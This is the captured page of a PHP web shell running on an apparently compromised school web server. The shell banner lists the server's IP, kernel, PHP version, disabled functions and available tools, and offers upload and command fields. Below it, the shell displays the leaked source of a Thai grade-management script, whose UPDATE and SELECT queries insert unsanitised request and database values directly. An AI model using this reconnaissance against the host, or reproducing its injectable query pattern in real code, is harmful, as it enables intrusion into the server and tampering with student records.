403Webshell
Server IP : 61.19.30.66  /  Your IP : 216.73.216.59
Web Server : Apache/2.2.22 (Ubuntu)
System : Linux klw 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:39:31 UTC 2014 x86_64
User : www-data ( 33)
PHP Version : 5.3.10-1ubuntu3.48
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/gpa/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/gpa//sgsscore.php
<?
require_once "config/teacher.php";
require_once "head.php";

?>
<?
$sql2="SELECT namesc,tumbolsc,amps,dissc,years,termx FROM config";
mysql_query("SET character_set_results=tis620");//ตั้งค่าการดึงข้อมูลออกมาให้เป็น tis620
mysql_query("SET character_set_client=tis620");//ตั้งค่าการส่งข้อมุลลงฐานข้อมูลออกมาให้ เป็น tis620
mysql_query("SET character_set_connection=tis620");//ตั้งค่าการติดต่อฐานข้อมูลให้เป็น ti
$result2 = mysql_query($sql2);

while (list($namesc,$tumbolsc,$amps,$dissc,$years,$termx) = mysql_fetch_row($result2)) {
$xsc_Name = $namesc;
$xsc_tumbolsc = $tumbolsc;
$xsc_disc = $dissc;
$xsc_amps = $amps;
$xsc_years = $years;
$xsc_termx = $termx;
}

?>
<html>
<head>
<meta http-equiv=Content-Type content="text/html; charset=tis-620">

<title>ฝ่ายบริหารงานวิชาการ</title>

</head>

<body>
<?
require_once "config/connectdb.php";


$year=date(" Y ")+542; 
//*** Update Condition ***//
if($_GET["Action"] == "Save")
{
	for($i=1;$i<=$_POST["hdnLine"];$i++)
	{
		$strSQL = "UPDATE registeacher SET ";
		$strSQL .="statusup = '".$_POST["txtsgs$i"]."' ";
		$strSQL .="WHERE idregist = '".$_POST["hdnid$i"]."' ";
		$objQuery = mysql_query($strSQL);
	}
	//header("location:$_SERVER[PHP_SELF]");
	//exit();
}
$strSQL = "SELECT * FROM registeacher where yearsxx='$xsc_years' and termxx='$xsc_termx' and statusup<1  order  by statusup asc,roomteach asc,codeteach asc,registeach asc";
$objQuery = mysql_query($strSQL) or die ("Error Query [".$strSQL."]");
$i = 1;

?>
<table width="773" border="0" align="center" cellpadding="0" cellspacing="0">
                <tr> 
                  <td width="198"><a href="admin_page.php"><font color="#FF0000" size="2">หน้าหลัก</font></a>
				  
                    </table></td>
                </tr>
              </table>
<form name="frmMain" method="post" action="sgsscore.php?Action=Save">
<table  width="100%" border="0" bgcolor="#999999">  
  <tr bgcolor="#FFFFFF">
    <th width="10"> <div align="center"></div></th>
	 <th width="10"> <div align="center">#</div></th>
    <th width="10"> <div align="center">รายวิชา</div></th>
	<th width="10"> <div align="center">ชั้น</div></th>
    <th width="10"> <div align="center">ครู</div></th>
	<th width="10"> <div align="center">ก่อน</div></th>
	<th width="10"> <div align="center">กลาง</div></th>
	<th width="10"> <div align="center">หลัง</div></th>
	<th width="10"> <div align="center">ปลาย</div></th>
	
	<th width="10"> <div align="center">จำนวนกิจกรรม</div></th>
    <th width="10"> <div align="center">ลง sgs</div></th>
	<th width="10"> <div align="center">REPORT</div></th>

  </tr>
<?
$i =0;
while($objResult = mysql_fetch_array($objQuery))
{
if($bg == "#EEEEEE") { //ส่วนของการ สลับสี 
$bg = "#FFFFFF";
} else {
$bg = "#EEEEEE";
}

$codeteach=$objResult["codeteach"];
$registeach=$objResult["registeach"];
$teach=$objResult["registeach"];
$code=$objResult["codeteach"];
$roomteach=$objResult["roomteach"];
$statusup=$objResult["statusup"];
$report=$objResult["report_regis"];





	$i = $i + 1;
?>


<?

				$crsql="SELECT ( ku1+pu1+au1+ku2+pu2+au2+ku3+pu3+au3 ) FROM `registeacher`
				WHERE codeteach = '$code' and registeach = '$teach' and yearsxx='$xsc_years'";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$bescore=$dcrd[0];

				$crsql="SELECT ( midterm ) FROM `registeacher`
				WHERE codeteach = '$code' and registeach = '$teach' and yearsxx='$xsc_years'";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$midterm=$dcrd[0];


				$crsql="SELECT ( ku4+pu4+au4+ku5+pu5+au5+ku6+pu6+au6 ) FROM `registeacher`
				WHERE codeteach = '$code' and registeach = '$teach' and yearsxx='$xsc_years'";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$afscore=$dcrd[0];

				$crsql="SELECT ( final ) FROM `registeacher`
				WHERE codeteach = '$code' and registeach = '$teach' and yearsxx='$xsc_years'";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$final=$dcrd[0];

				$all=$bescore+$midterm+$afscore+$final;


?>
  <tr bgcolor="<?=$bg?>">
    <td><div align="center">
	<input type="hidden" name="hdnid<?=$i;?>" size="5" value="<?=$objResult["idregist"];?>">
	 <td><?=$i?></td>
	
	</div></td>
    <td><? echo $codeteach; ?></td>
	<td><? echo $roomteach; ?></td>
	

<td><? echo $registeach; ?></td>
<td><? echo "$bescore"; ?></td>
	<td><? echo "$midterm"; ?></td>
	<td><? echo "$afscore"; ?></td>
	<td><? echo "$final"; ?></td>
	<td><? echo "$all"; ?></td>
<td>

<input type="radio" name="txtsgs<?=$i;?>" value="1" <? if($statusup=="1"){ echo "checked"; }?>>in

<input type="radio" name="txtsgs<?=$i;?>" value="0" <? if($statusup<1){ echo "checked"; }?>>no
&nbsp;&nbsp;&nbsp;&nbsp;
<? if($statusup==0)
 {
   echo "";
 }
 else if($statusup>0)
 {
   echo "SGS OK";
 }
?>
</td>

<td></td>

  </tr>
<?
	  $i = $i;
  }
  ?>
</table>
  <input type="submit" name="submit" value="บันทึก">
  <input type="hidden" name="hdnLine" value="<?=$i;?>">
  
</form>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit